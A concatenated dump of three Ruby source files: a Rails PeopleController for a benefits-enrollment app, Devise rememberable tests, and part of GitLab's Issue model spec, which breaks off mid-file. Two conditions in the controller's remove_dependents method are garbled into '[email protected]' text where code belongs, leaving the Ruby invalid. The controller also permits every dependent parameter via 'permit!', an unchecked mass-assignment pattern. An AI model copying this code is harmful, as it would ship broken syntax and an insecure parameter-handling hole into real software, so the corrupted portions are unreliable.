e26f0868caf07c22ec59862870e094d5495d5eb6 | 12,860 | class PeopleController < ApplicationController
include ApplicationHelper
include ErrorBubble
include VlpDoc
def new
@person = Person.new
build_nested_models
# render action: "new", layout: "form"
end
def check_qle_marriage_date
date_married = Date.parse(params[:date_val])
start_date = Date.parse('01/10/2013')
end_date = TimeKeeper.date_of_record
if start_date <= date_married && date_married <= end_date
# Qualifed
@qualified_date = true
else
# Not Qualified
@qualified_date = false
end
# else {
# var startDate = Date.parse('2013-10-01'), endDate = Date.parse(new Date()), enteredDate = Date.parse(date_value);
# return ((startDate <= enteredDate) && (enteredDate <= endDate));
# }
end
def register_employee_dependents
@family = Family.find(params[:id])
@employee_role = EmployeeRole.find(params[:id])
@family.updated_by = current_user.oim_id unless current_user.nil?
@employee_role.updated_by = current_user.oim_id unless current_user.nil?
# May need person init code here
if (@family.update_attributes(@family) && @employee_role.update_attributes(@employee_role))
@person = @employee_role.person
if params[:commit].downcase.include?('continue')
@organization = @employee_role.employer_profile.organization
@employee_role = EmployeeRole.find(params[:employee_role])
redirect_to select_plan_people_path
end
if params[:commit].downcase.include?('exit')
# Logout of session
else
redirect_to person_person_landing(@person)
end
else
render new, :error => "Please complete all required fields"
end
end
# Uses identifying information to return one or more for matches in employer census
def match_employer
end
def link_employer
end
def person_confirm
@person = Person.find(params[:person_id])
if params[:employer_id].to_i != 0
@employer = Employer.find(params[:employer_id])
#@employee = Employer
employee_family = Employer.where(:"id" => @employer.id).where(:"employee_families.employee.ssn" => @person.ssn).last.employee_families.last
@coverage = employee_family.dependents.present? ? "Individual + Family" : "Individual"
@coverage_flag = "I"
else
@employee = @person
end
respond_to do |format|
format.js {}
end
end
def plan_details
#add_employee_role
end
def dependent_details
add_employee_role
@employer_profile = @employee_role.employer_profile
@employer = @employer_profile.organization
@person = @employee_role.person
# @employee = @employer_profile.find_employee_by_person(@person)
# employee_family = Organization.find(@employer.id).employee_family_details(@person)
# @employee = employee_family.census_employee
build_nested_models
end
def add_employee_role
@person = Person.find(params[:person_id])
@employer_profile = Organization.find(params[:organization_id]).employer_profile
employer_census_family = @employer_profile.linkable_employee_family_by_person(@person)
#calling add_employee_role when linkable employee family present
if employer_census_family.present?
enroll_parms = {}
enroll_parms[:user] = current_user
enroll_parms[:employer_profile] = @employer_profile
enroll_parms[:ssn] = @person.ssn
enroll_parms[:last_name] = @person.last_name
enroll_parms[:first_name] = @person.first_name
enroll_parms[:gender] = @person.gender
enroll_parms[:dob] = @person.dob
enroll_parms[:name_sfx] = @person.name_sfx
enroll_parms[:name_pfx] = @person.name_pfx
enroll_parms[:hired_on] = params[:hired_on]
@employee_role, @family = Factories::EnrollmentFactory.add_employee_role(enroll_parms)
else
@employee_role = @person.employee_roles.first
@family = @person.primary_family
end
end
def add_dependents
@person = Person.find(params[:person_id])
@employer = Organization.find(params[:organization_id])
# employee_family = Organization.find(@employer.id).employee_family_details(@person)
@employee = @person.employee_roles.first
@dependent = FamilyMember.new(family: @person.primary_family)
end
def save_dependents
@person = Person.find(params[:person])
@employer = Organization.find(params[:employer])
family = @person.primary_family
member = Person.new(dependent_params)
new_dependent = FamilyMember.new(id: params[:family_member][:id], person: member)
@dependent = family.family_members.where(_id: new_dependent.id).first
if @dependent.blank?
@dependent = family.family_members.new(id: params[:family_member][:id], person: member)
respond_to do |format|
if member.save && @dependent.save
@person.person_relationships.create(kind: params[:family_member][:primary_relationship], relative_id: member.id)
family.households.first.coverage_households.first.coverage_household_members.find_or_create_by(applicant_id: params[:family_member][:id])
format.js { flash.now[:notice] = "Family Member Added." }
else
format.js { flash.now[:error_msg] = "Error in Family Member Addition. #{member.errors.full_messages}" }
end
end
else
if @dependent.update_attributes(dependent_params)
respond_to do |format|
format.js { flash.now[:notice] = "Family Member Updated." }
end
else
respond_to do |format|
format.js { flash.now[:error_msg] = "Error in Family Member Edit. #{member.errors.full_messages}" }
end
end
end
end
def remove_dependents
@person = Person.find(params[:person_id])
@employer = Organization.find(params[:organization_id])
@family = @person.primary_family
@dependent = @family.family_members.where(_id: params[:id]).first
if [email protected]?
@family_member_id = @dependent._id
if [email protected]_primary_applicant
@dependent.destroy
@person.person_relationships.where(relative_id: @dependent.person_id).destroy_all
@family.households.first.coverage_households.first.coverage_household_members.where(applicant_id: params[:id]).destroy_all
@flash = "Family Member Removed"
else
@flash = "Primary member can not be deleted"
end
else
@family_member_id = params[:id]
end
respond_to do |format|
format.js { flash.now[:notice] = @flash }
end
end
def get_census_employee(id)
CensusEmployee.find(id)
end
def update
sanitize_person_params
@person = find_person(params[:id])
clean_duplicate_addresses
@person.updated_by = current_user.oim_id unless current_user.nil?
if @person.has_active_consumer_role? && request.referer.include?("insured/families/personal")
update_vlp_documents(@person.consumer_role, 'person')
redirect_path = personal_insured_families_path
else
redirect_path = family_account_path
end
respond_to do |format|
if @person.update_attributes(person_params)
format.html { redirect_to redirect_path, notice: 'Person was successfully updated.' }
format.json { head :no_content }
else
@person.addresses = @old_addresses
if @person.has_active_consumer_role?
bubble_consumer_role_errors_by_person(@person)
@vlp_doc_subject = get_vlp_doc_subject_by_consumer_role(@person.consumer_role)
end
build_nested_models
person_error_megs = @person.errors.full_messages.join('<br/>') if @person.errors.present?
format.html { redirect_to redirect_path, alert: "Person update failed. #{person_error_megs}" }
# format.html { redirect_to edit_insured_employee_path(@person) }
format.json { render json: @person.errors, status: :unprocessable_entity }
end
end
end
def create
sanitize_person_params
@person = Person.find_or_initialize_by(encrypted_ssn: Person.encrypt_ssn(params[:person][:ssn]), date_of_birth: params[:person][:dob])
# Delete old sub documents
@person.addresses.each {|address| address.delete}
@person.phones.each {|phone| phone.delete}
@person.emails.each {|email| email.delete}
# person_params
respond_to do |format|
if @person.update_attributes(person_params)
format.html { redirect_to insured_employee_path(@person), notice: 'Person was successfully created.' }
format.json { render json: @person, status: :created, location: @person }
else
build_nested_models
format.html { render action: "new" }
format.json { render json: @person.errors, status: :unprocessable_entity }
end
end
end
def edit
@person = Person.find(params[:id])
build_nested_models
end
def show
@person = Person.find(params[:id])
@employer_profile= EmployerProfile.find_all_by_person(@person).first
build_nested_models
end
def select_plan
hbx_enrollment_id = params.require(:hbx_enrollment_id)
Caches::MongoidCache.allocate(CarrierProfile)
@person = current_user.person
@hbx_enrollment = find_hbx_enrollment(hbx_enrollment_id)
@benefit_group = @hbx_enrollment.benefit_group
@reference_plan = @hbx_enrollment.coverage_kind == 'dental' ? @benefit_group.dental_reference_plan : @benefit_group.reference_plan
@plans = @benefit_group.elected_plans.entries.collect() do |plan|
PlanCostDecorator.new(plan, @hbx_enrollment, @benefit_group, @reference_plan)
end
end
def enroll_family
@hbx_enrollment = HbxEnrollment.find(params[:hbx_enrollment_id])
end
def get_member
member = find_person(params[:id])
render partial: 'people/landing_pages/member_address', locals: {person: member}
end
private
def safe_find(klass, id)
# puts "finding #{klass} #{id}"
begin
klass.find(id)
rescue
nil
end
end
def find_person(id)
safe_find(Person, id)
end
def find_organization(id)
safe_find(Organization, id)
end
def find_hbx_enrollment(id)
safe_find(HbxEnrollment, id)
end
def build_nested_models
["home","mobile","work","fax"].each do |kind|
@person.phones.build(kind: kind) if @person.phones.select{|phone| phone.kind == kind}.blank?
end
Address::KINDS.each do |kind|
@person.addresses.build(kind: kind) if @person.addresses.select{|address| address.kind == kind}.blank?
end
["home","work"].each do |kind|
@person.emails.build(kind: kind) if @person.emails.select{|email| email.kind == kind}.blank?
end
end
def sanitize_person_params
if person_params["addresses_attributes"].present?
person_params["addresses_attributes"].each do |key, address|
if address["city"].blank? && address["zip"].blank? && address["address_1"].blank?
params["person"]["addresses_attributes"].delete("#{key}")
end
end
params["person"]["addresses_attributes"] = person_params["addresses_attributes"].values.uniq #fix unexpected duplicate issue
end
if person_params["phones_attributes"].present?
person_params["phones_attributes"].each do |key, phone|
if phone["full_phone_number"].blank?
params["person"]["phones_attributes"].delete("#{key}")
end
end
end
if person_params["emails_attributes"].present?
person_params["emails_attributes"].each do |key, email|
if email["address"].blank?
params["person"]["emails_attributes"].delete("#{key}")
end
end
end
end
def person_params
params.require(:person).permit(*person_parameters_list)
end
def person_parameters_list
[
{ :addresses_attributes => [:kind, :address_1, :address_2, :city, :state, :zip, :id] },
{ :phones_attributes => [:kind, :full_phone_number, :id] },
{ :emails_attributes => [:kind, :address, :id] },
{ :consumer_role_attributes => [:contact_method, :language_preference, :id]},
{ :employee_roles_attributes => [:id, :contact_method, :language_preference]},
:first_name,
:middle_name,
:last_name,
:name_sfx,
:gender,
:us_citizen,
:is_incarcerated,
:language_code,
:is_disabled,
:race,
:is_consumer_role,
:is_resident_role,
:naturalized_citizen,
:eligible_immigration_status,
:indian_tribe_member,
{:ethnicity => []},
:tribal_id,
:no_dc_address,
:no_dc_address_reason,
:id
]
end
def dependent_params
params.require(:family_member).reject{|k, v| k == "id" or k =="primary_relationship"}.permit!
end
def clean_duplicate_addresses
@old_addresses = @person.addresses
@person.addresses = [] #fix unexpected duplicates issue
end
end
| 32.890026 | 147 | 0.689658 |
d592dc52256aa2cbb21ff1c118286a186559db9e | 8,343 | require 'test_helper'
module SharedRememberableTest
extend ActiveSupport::Testing::Declarative
test 'should respond to remember_me attribute' do
assert resource_class.new.respond_to?(:remember_me)
assert resource_class.new.respond_to?(:remember_me=)
end
test 'forget_me should clear remember_created_at' do
resource = create_resource
resource.remember_me!
assert_not resource.remember_created_at.nil?
resource.forget_me!
assert resource.remember_created_at.nil?
end
test 'remember is expired if not created at timestamp is set' do
assert create_resource.remember_expired?
end
test 'serialize should return nil if no resource is found' do
assert_nil resource_class.serialize_from_cookie([0], "123")
end
test 'remember me return nil if is a valid resource with invalid token' do
resource = create_resource
assert_nil resource_class.serialize_from_cookie([resource.id], "123")
end
test 'remember for should fallback to devise remember for default configuration' do
swap Devise, :remember_for => 1.day do
resource = create_resource
resource.remember_me!
assert_not resource.remember_expired?
end
end
test 'remember expires at should sum date of creation with remember for configuration' do
swap Devise, :remember_for => 3.days do
resource = create_resource
resource.remember_me!
assert_equal 3.days.from_now.to_date, resource.remember_expires_at.to_date
Devise.remember_for = 5.days
assert_equal 5.days.from_now.to_date, resource.remember_expires_at.to_date
end
end
test 'remember should be expired if remember_for is zero' do
swap Devise, :remember_for => 0.days do
Devise.remember_for = 0.days
resource = create_resource
resource.remember_me!
assert resource.remember_expired?
end
end
test 'remember should be expired if it was created before limit time' do
swap Devise, :remember_for => 1.day do
resource = create_resource
resource.remember_me!
resource.remember_created_at = 2.days.ago
resource.save
assert resource.remember_expired?
end
end
test 'remember should not be expired if it was created whitin the limit time' do
swap Devise, :remember_for => 30.days do
resource = create_resource
resource.remember_me!
resource.remember_created_at = (30.days.ago + 2.minutes)
resource.save
assert_not resource.remember_expired?
end
end
test 'if extend_remember_period is false, remember_me! should generate a new timestamp if expired' do
swap Devise, :remember_for => 5.minutes do
resource = create_resource
resource.remember_me!(false)
assert resource.remember_created_at
resource.remember_created_at = old = 10.minutes.ago
resource.save
resource.remember_me!(false)
assert_not_equal old.to_i, resource.remember_created_at.to_i
end
end
test 'if extend_remember_period is false, remember_me! should not generate a new timestamp' do
swap Devise, :remember_for => 1.year do
resource = create_resource
resource.remember_me!(false)
assert resource.remember_created_at
resource.remember_created_at = old = 10.minutes.ago.utc
resource.save
resource.remember_me!(false)
assert_equal old.to_i, resource.remember_created_at.to_i
end
end
test 'if extend_remember_period is true, remember_me! should always generate a new timestamp' do
swap Devise, :remember_for => 1.year do
resource = create_resource
resource.remember_me!(true)
assert resource.remember_created_at
resource.remember_created_at = old = 10.minutes.ago
resource.save
resource.remember_me!(true)
assert_not_equal old, resource.remember_created_at
end
end
end
class RememberableTest < ActiveSupport::TestCase
include SharedRememberableTest
def resource_class
Admin
end
def create_resource
create_admin
end
test 'remember_me should generate a new token and save the record without validating' do
admin = create_admin
admin.expects(:valid?).never
token = admin.remember_token
admin.remember_me!
assert_not_equal token, admin.remember_token
assert_not admin.changed?
end
test 'forget_me should clear remember token and save the record without validating' do
admin = create_admin
admin.remember_me!
assert_not admin.remember_token.nil?
admin.expects(:valid?).never
admin.forget_me!
assert admin.remember_token.nil?
assert_not admin.changed?
end
test 'serialize into cookie' do
admin = create_admin
admin.remember_me!
assert_equal [admin.to_key, admin.remember_token], Admin.serialize_into_cookie(admin)
end
test 'serialize from cookie' do
admin = create_admin
admin.remember_me!
assert_equal admin, Admin.serialize_from_cookie(admin.to_key, admin.remember_token)
end
test 'if remember_across_browsers is true, remember_me! should create a new token if no token exists' do
swap Devise, :remember_across_browsers => true, :remember_for => 1.year do
admin = create_admin
assert_equal nil, admin.remember_token
admin.remember_me!
assert_not_equal nil, admin.remember_token
end
end
test 'if remember_across_browsers is true, remember_me! should create a new token if a token exists but has expired' do
swap Devise, :remember_across_browsers => true, :remember_for => 1.day do
admin = create_admin
admin.remember_me!
admin.remember_created_at = 2.days.ago
admin.save
token = admin.remember_token
admin.remember_me!
assert_not_equal token, admin.remember_token
end
end
test 'if remember_across_browsers is true, remember_me! should not create a new token if a token exists and has not expired' do
swap Devise, :remember_across_browsers => true, :remember_for => 2.days do
admin = create_admin
admin.remember_me!
admin.remember_created_at = 1.day.ago
admin.save
token = admin.remember_token
admin.remember_me!
assert_equal token, admin.remember_token
end
end
test 'if remember_across_browsers is false, remember_me! should create a new token if no token exists' do
swap Devise, :remember_across_browsers => false do
admin = create_admin
assert_equal nil, admin.remember_token
admin.remember_me!
assert_not_equal nil, admin.remember_token
end
end
test 'if remember_across_browsers is false, remember_me! should create a new token if a token exists but has expired' do
swap Devise, :remember_across_browsers => false, :remember_for => 1.day do
admin = create_admin
admin.remember_me!
admin.remember_created_at = 2.days.ago
admin.save
token = admin.remember_token
admin.remember_me!
assert_not_equal token, admin.remember_token
end
end
test 'if remember_across_browsers is false, remember_me! should create a new token if a token exists and has not expired' do
swap Devise, :remember_across_browsers => false, :remember_for => 2.days do
admin = create_admin
admin.remember_me!
admin.remember_created_at = 1.day.ago
admin.save
token = admin.remember_token
admin.remember_me!
assert_not_equal token, admin.remember_token
end
end
end
class WithSaltRememberableTest < ActiveSupport::TestCase
include SharedRememberableTest
setup do
assert_not User.new.respond_to?(:remember_token)
end
def resource_class
User
end
def create_resource
create_user
end
test 'remember_me should not generate a new token if using salt' do
user = create_user
user.expects(:valid?).never
user.remember_me!
end
test 'forget_me should not clear remember token if using salt' do
user = create_user
user.remember_me!
user.expects(:valid?).never
user.forget_me!
end
test 'serialize into cookie' do
user = create_user
user.remember_me!
assert_equal [user.to_key, user.authenticatable_salt], User.serialize_into_cookie(user)
end
test 'serialize from cookie' do
user = create_user
user.remember_me!
assert_equal user, User.serialize_from_cookie(user.to_key, user.authenticatable_salt)
end
end
| 30.672794 | 129 | 0.730792 |
edb93ecf4b6cc5ad283ef3791874f4d128419f82 | 45,441 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe Issue do
include ExternalAuthorizationServiceHelpers
using RSpec::Parameterized::TableSyntax
let_it_be(:user) { create(:user) }
let_it_be(:reusable_project) { create(:project) }
describe "Associations" do
it { is_expected.to belong_to(:milestone) }
it { is_expected.to belong_to(:iteration) }
it { is_expected.to belong_to(:project) }
it { is_expected.to have_one(:namespace).through(:project) }
it { is_expected.to belong_to(:moved_to).class_name('Issue') }
it { is_expected.to have_one(:moved_from).class_name('Issue') }
it { is_expected.to belong_to(:duplicated_to).class_name('Issue') }
it { is_expected.to belong_to(:closed_by).class_name('User') }
it { is_expected.to have_many(:assignees) }
it { is_expected.to have_many(:user_mentions).class_name("IssueUserMention") }
it { is_expected.to have_many(:designs) }
it { is_expected.to have_many(:design_versions) }
it { is_expected.to have_one(:sentry_issue) }
it { is_expected.to have_one(:alert_management_alert) }
it { is_expected.to have_many(:resource_milestone_events) }
it { is_expected.to have_many(:resource_state_events) }
it { is_expected.to have_and_belong_to_many(:prometheus_alert_events) }
it { is_expected.to have_and_belong_to_many(:self_managed_prometheus_alert_events) }
it { is_expected.to have_many(:prometheus_alerts) }
it { is_expected.to have_many(:issue_email_participants) }
describe 'versions.most_recent' do
it 'returns the most recent version' do
issue = create(:issue, project: reusable_project)
create_list(:design_version, 2, issue: issue)
last_version = create(:design_version, issue: issue)
expect(issue.design_versions.most_recent).to eq(last_version)
end
end
end
describe 'modules' do
subject { described_class }
it { is_expected.to include_module(Issuable) }
it { is_expected.to include_module(Referable) }
it { is_expected.to include_module(Sortable) }
it { is_expected.to include_module(Taskable) }
it { is_expected.to include_module(MilestoneEventable) }
it { is_expected.to include_module(StateEventable) }
it_behaves_like 'AtomicInternalId' do
let(:internal_id_attribute) { :iid }
let(:instance) { build(:issue) }
let(:scope) { :project }
let(:scope_attrs) { { project: instance.project } }
let(:usage) { :issues }
end
end
describe 'validations' do
subject { issue.valid? }
describe 'issue_type' do
let(:issue) { build(:issue, issue_type: issue_type) }
context 'when a valid type' do
let(:issue_type) { :issue }
it { is_expected.to eq(true) }
end
context 'empty type' do
let(:issue_type) { nil }
it { is_expected.to eq(false) }
end
end
end
subject { create(:issue, project: reusable_project) }
describe 'callbacks' do
describe '#ensure_metrics' do
it 'creates metrics after saving' do
expect(subject.metrics).to be_persisted
expect(Issue::Metrics.count).to eq(1)
end
it 'does not create duplicate metrics for an issue' do
subject.close!
expect(subject.metrics).to be_persisted
expect(Issue::Metrics.count).to eq(1)
end
it 'records current metrics' do
expect_any_instance_of(Issue::Metrics).to receive(:record!)
create(:issue, project: reusable_project)
end
context 'when metrics record is missing' do
before do
subject.metrics.delete
subject.reload
subject.metrics # make sure metrics association is cached (currently nil)
end
it 'creates the metrics record' do
subject.update!(title: 'title')
expect(subject.metrics).to be_present
end
end
end
describe '#record_create_action' do
it 'records the creation action after saving' do
expect(Gitlab::UsageDataCounters::IssueActivityUniqueCounter).to receive(:track_issue_created_action)
create(:issue)
end
end
end
describe '.with_alert_management_alerts' do
subject { described_class.with_alert_management_alerts }
it 'gets only issues with alerts' do
alert = create(:alert_management_alert, project: reusable_project, issue: create(:issue, project: reusable_project))
issue = create(:issue, project: reusable_project)
expect(subject).to contain_exactly(alert.issue)
expect(subject).not_to include(issue)
end
end
describe '.simple_sorts' do
it 'includes all keys' do
expect(described_class.simple_sorts.keys).to include(
*%w(created_asc created_at_asc created_date created_desc created_at_desc
closest_future_date closest_future_date_asc due_date due_date_asc due_date_desc
id_asc id_desc relative_position relative_position_asc
updated_desc updated_asc updated_at_asc updated_at_desc))
end
end
describe '.with_issue_type' do
let_it_be(:issue) { create(:issue, project: reusable_project) }
let_it_be(:incident) { create(:incident, project: reusable_project) }
it 'gives issues with the given issue type' do
expect(described_class.with_issue_type('issue'))
.to contain_exactly(issue)
end
it 'gives issues with the given issue type' do
expect(described_class.with_issue_type(%w(issue incident)))
.to contain_exactly(issue, incident)
end
end
describe '.order_severity' do
let_it_be(:issue_high_severity) { create(:issuable_severity, severity: :high).issue }
let_it_be(:issue_low_severity) { create(:issuable_severity, severity: :low).issue }
let_it_be(:issue_no_severity) { create(:incident) }
context 'sorting ascending' do
subject { described_class.order_severity_asc }
it { is_expected.to eq([issue_no_severity, issue_low_severity, issue_high_severity]) }
end
context 'sorting descending' do
subject { described_class.order_severity_desc }
it { is_expected.to eq([issue_high_severity, issue_low_severity, issue_no_severity]) }
end
end
describe '#order_by_position_and_priority' do
let(:project) { reusable_project }
let(:p1) { create(:label, title: 'P1', project: project, priority: 1) }
let(:p2) { create(:label, title: 'P2', project: project, priority: 2) }
let!(:issue1) { create(:labeled_issue, project: project, labels: [p1]) }
let!(:issue2) { create(:labeled_issue, project: project, labels: [p2]) }
let!(:issue3) { create(:issue, project: project, relative_position: -200) }
let!(:issue4) { create(:issue, project: project, relative_position: -100) }
it 'returns ordered list' do
expect(project.issues.order_by_position_and_priority)
.to match [issue3, issue4, issue1, issue2]
end
end
describe '#sort' do
let(:project) { reusable_project }
context "by relative_position" do
let!(:issue) { create(:issue, project: project, relative_position: nil) }
let!(:issue2) { create(:issue, project: project, relative_position: 2) }
let!(:issue3) { create(:issue, project: project, relative_position: 1) }
it "sorts asc with nulls at the end" do
issues = project.issues.sort_by_attribute('relative_position')
expect(issues).to eq([issue3, issue2, issue])
end
end
end
describe '#card_attributes' do
it 'includes the author name' do
allow(subject).to receive(:author).and_return(double(name: 'Robert'))
allow(subject).to receive(:assignees).and_return([])
expect(subject.card_attributes)
.to eq({ 'Author' => 'Robert', 'Assignee' => '' })
end
it 'includes the assignee name' do
allow(subject).to receive(:author).and_return(double(name: 'Robert'))
allow(subject).to receive(:assignees).and_return([double(name: 'Douwe')])
expect(subject.card_attributes)
.to eq({ 'Author' => 'Robert', 'Assignee' => 'Douwe' })
end
end
describe '#close' do
subject(:issue) { create(:issue, project: reusable_project, state: 'opened') }
it 'sets closed_at to Time.current when an issue is closed' do
expect { issue.close }.to change { issue.closed_at }.from(nil)
end
it 'changes the state to closed' do
open_state = described_class.available_states[:opened]
closed_state = described_class.available_states[:closed]
expect { issue.close }.to change { issue.state_id }.from(open_state).to(closed_state)
end
context 'when an argument is provided' do
context 'and the argument is a User' do
it 'changes closed_by to the given user' do
expect { issue.close(user) }.to change { issue.closed_by }.from(nil).to(user)
end
end
context 'and the argument is a not a User' do
it 'does not change closed_by' do
expect { issue.close("test") }.not_to change { issue.closed_by }
end
end
end
context 'when an argument is not provided' do
it 'does not change closed_by' do
expect { issue.close }.not_to change { issue.closed_by }
end
end
end
describe '#reopen' do
let(:issue) { create(:issue, project: reusable_project, state: 'closed', closed_at: Time.current, closed_by: user) }
it 'sets closed_at to nil when an issue is reopened' do
expect { issue.reopen }.to change { issue.closed_at }.to(nil)
end
it 'sets closed_by to nil when an issue is reopened' do
expect { issue.reopen }.to change { issue.closed_by }.from(user).to(nil)
end
it 'changes the state to opened' do
expect { issue.reopen }.to change { issue.state_id }.from(described_class.available_states[:closed]).to(described_class.available_states[:opened])
end
end
describe '#to_reference' do
let(:namespace) { build(:namespace, path: 'sample-namespace') }
let(:project) { build(:project, name: 'sample-project', namespace: namespace) }
let(:issue) { build(:issue, iid: 1, project: project) }
context 'when nil argument' do
it 'returns issue id' do
expect(issue.to_reference).to eq "#1"
end
it 'returns complete path to the issue with full: true' do
expect(issue.to_reference(full: true)).to eq 'sample-namespace/sample-project#1'
end
end
context 'when argument is a project' do
context 'when same project' do
it 'returns issue id' do
expect(issue.to_reference(project)).to eq("#1")
end
it 'returns full reference with full: true' do
expect(issue.to_reference(project, full: true)).to eq 'sample-namespace/sample-project#1'
end
end
context 'when cross-project in same namespace' do
let(:another_project) do
build(:project, name: 'another-project', namespace: project.namespace)
end
it 'returns a cross-project reference' do
expect(issue.to_reference(another_project)).to eq "sample-project#1"
end
end
context 'when cross-project in different namespace' do
let(:another_namespace) { build(:namespace, id: non_existing_record_id, path: 'another-namespace') }
let(:another_namespace_project) { build(:project, path: 'another-project', namespace: another_namespace) }
it 'returns complete path to the issue' do
expect(issue.to_reference(another_namespace_project)).to eq 'sample-namespace/sample-project#1'
end
end
end
context 'when argument is a namespace' do
context 'when same as issue' do
it 'returns path to the issue with the project name' do
expect(issue.to_reference(namespace)).to eq 'sample-project#1'
end
it 'returns full reference with full: true' do
expect(issue.to_reference(namespace, full: true)).to eq 'sample-namespace/sample-project#1'
end
end
context 'when different to issue namespace' do
let(:group) { build(:group, name: 'Group', path: 'sample-group') }
it 'returns full path to the issue with full: true' do
expect(issue.to_reference(group)).to eq 'sample-namespace/sample-project#1'
end
end
end
end
describe '#assignee_or_author?' do
let(:issue) { create(:issue, project: reusable_project) }
it 'returns true for a user that is assigned to an issue' do
issue.assignees << user
expect(issue.assignee_or_author?(user)).to be_truthy
end
it 'returns true for a user that is the author of an issue' do
issue.update!(author: user)
expect(issue.assignee_or_author?(user)).to be_truthy
end
it 'returns false for a user that is not the assignee or author' do
expect(issue.assignee_or_author?(user)).to be_falsey
end
end
describe '#related_issues' do
let_it_be(:authorized_project) { create(:project) }
let_it_be(:authorized_project2) { create(:project) }
let_it_be(:unauthorized_project) { create(:project) }
let_it_be(:authorized_issue_a) { create(:issue, project: authorized_project) }
let_it_be(:authorized_issue_b) { create(:issue, project: authorized_project) }
let_it_be(:authorized_issue_c) { create(:issue, project: authorized_project2) }
let_it_be(:unauthorized_issue) { create(:issue, project: unauthorized_project) }
let_it_be(:issue_link_a) { create(:issue_link, source: authorized_issue_a, target: authorized_issue_b) }
let_it_be(:issue_link_b) { create(:issue_link, source: authorized_issue_a, target: unauthorized_issue) }
let_it_be(:issue_link_c) { create(:issue_link, source: authorized_issue_a, target: authorized_issue_c) }
before_all do
authorized_project.add_developer(user)
authorized_project2.add_developer(user)
end
it 'returns only authorized related issues for given user' do
expect(authorized_issue_a.related_issues(user))
.to contain_exactly(authorized_issue_b, authorized_issue_c)
end
it 'returns issues with valid issue_link_type' do
link_types = authorized_issue_a.related_issues(user).map(&:issue_link_type)
expect(link_types).not_to be_empty
expect(link_types).not_to include(nil)
end
it 'returns issues including the link creation time' do
dates = authorized_issue_a.related_issues(user).map(&:issue_link_created_at)
expect(dates).not_to be_empty
expect(dates).not_to include(nil)
end
it 'returns issues including the link update time' do
dates = authorized_issue_a.related_issues(user).map(&:issue_link_updated_at)
expect(dates).not_to be_empty
expect(dates).not_to include(nil)
end
describe 'when a user cannot read cross project' do
it 'only returns issues within the same project' do
expect(Ability).to receive(:allowed?).with(user, :read_all_resources, :global).at_least(:once).and_call_original
expect(Ability).to receive(:allowed?).with(user, :read_cross_project).and_return(false)
expect(authorized_issue_a.related_issues(user))
.to contain_exactly(authorized_issue_b)
end
end
end
describe '#can_move?' do
let(:issue) { create(:issue) }
subject { issue.can_move?(user) }
context 'user is not a member of project issue belongs to' do
it { is_expected.to eq false}
end
context 'user is reporter in project issue belongs to' do
let(:issue) { create(:issue, project: reusable_project) }
before_all do
reusable_project.add_reporter(user)
end
it { is_expected.to eq true }
context 'issue not persisted' do
let(:issue) { build(:issue, project: reusable_project) }
it { is_expected.to eq false }
end
context 'checking destination project also' do
subject { issue.can_move?(user, to_project) }
let_it_be(:to_project) { create(:project) }
context 'destination project allowed' do
before do
to_project.add_reporter(user)
end
it { is_expected.to eq true }
end
context 'destination project not allowed' do
before do
to_project.add_guest(user)
end
it { is_expected.to eq false }
end
end
end
end
describe '#moved?' do
context 'when issue has not been moved' do
subject { build_stubbed(:issue) }
it { is_expected.not_to be_moved }
end
context 'when issue has already been moved' do
subject { build_stubbed(:issue, moved_to: build_stubbed(:issue)) }
it { is_expected.to be_moved }
end
end
describe '#duplicated?' do
let(:issue) { create(:issue, project: reusable_project) }
subject { issue.duplicated? }
context 'issue not duplicated' do
it { is_expected.to eq false }
end
context 'issue already duplicated' do
let(:duplicated_to_issue) { create(:issue, project: reusable_project) }
let(:issue) { create(:issue, duplicated_to: duplicated_to_issue) }
it { is_expected.to eq true }
end
end
describe '#from_service_desk?' do
subject { issue.from_service_desk? }
context 'when issue author is support bot' do
let(:issue) { create(:issue, project: reusable_project, author: ::User.support_bot) }
it { is_expected.to be_truthy }
end
context 'when issue author is not support bot' do
let(:issue) { create(:issue, project: reusable_project) }
it { is_expected.to be_falsey }
end
end
describe '#suggested_branch_name' do
let(:repository) { double }
subject { build(:issue) }
before do
allow(subject.project).to receive(:repository).and_return(repository)
end
describe '#to_branch_name does not exists' do
before do
allow(repository).to receive(:branch_exists?).and_return(false)
end
it 'returns #to_branch_name' do
expect(subject.suggested_branch_name).to eq(subject.to_branch_name)
end
end
describe '#to_branch_name exists not ending with -index' do
before do
allow(repository).to receive(:branch_exists?).and_return(true)
allow(repository).to receive(:branch_exists?).with(/#{subject.to_branch_name}-\d/).and_return(false)
end
it 'returns #to_branch_name ending with -2' do
expect(subject.suggested_branch_name).to eq("#{subject.to_branch_name}-2")
end
end
describe '#to_branch_name exists ending with -index' do
before do
allow(repository).to receive(:branch_exists?).and_return(true)
allow(repository).to receive(:branch_exists?).with("#{subject.to_branch_name}-3").and_return(false)
end
it 'returns #to_branch_name ending with max index + 1' do
expect(subject.suggested_branch_name).to eq("#{subject.to_branch_name}-3")
end
end
end
describe '#has_related_branch?' do
let(:issue) { create(:issue, project: reusable_project, title: "Blue Bell Knoll") }
subject { issue.has_related_branch? }
context 'branch found' do
before do
allow(issue.project.repository).to receive(:branch_names).and_return(["iceblink-luck", issue.to_branch_name])
end
it { is_expected.to eq true }
end
context 'branch not found' do
before do
allow(issue.project.repository).to receive(:branch_names).and_return(["lazy-calm"])
end
it { is_expected.to eq false }
end
end
it_behaves_like 'an editable mentionable' do
subject { create(:issue, project: create(:project, :repository)) }
let(:backref_text) { "issue #{subject.to_reference}" }
let(:set_mentionable_text) { ->(txt) { subject.description = txt } }
end
it_behaves_like 'a Taskable' do
let(:subject) { create :issue }
end
describe "#to_branch_name" do
let_it_be(:issue) { create(:issue, project: reusable_project, title: 'testing-issue') }
it 'starts with the issue iid' do
expect(issue.to_branch_name).to match(/\A#{issue.iid}-[A-Za-z\-]+\z/)
end
it "contains the issue title if not confidential" do
expect(issue.to_branch_name).to match(/testing-issue\z/)
end
it "does not contain the issue title if confidential" do
issue = create(:issue, project: reusable_project, title: 'testing-issue', confidential: true)
expect(issue.to_branch_name).to match(/confidential-issue\z/)
end
context 'issue title longer than 100 characters' do
let_it_be(:issue) { create(:issue, project: reusable_project, iid: 999, title: 'Lorem ipsum dolor sit amet consectetur adipiscing elit Mauris sit amet ipsum id lacus custom fringilla convallis') }
it "truncates branch name to at most 100 characters" do
expect(issue.to_branch_name.length).to be <= 100
end
it "truncates dangling parts of the branch name" do
# 100 characters would've got us "999-lorem...lacus-custom-fri".
expect(issue.to_branch_name).to eq("999-lorem-ipsum-dolor-sit-amet-consectetur-adipiscing-elit-mauris-sit-amet-ipsum-id-lacus-custom")
end
end
end
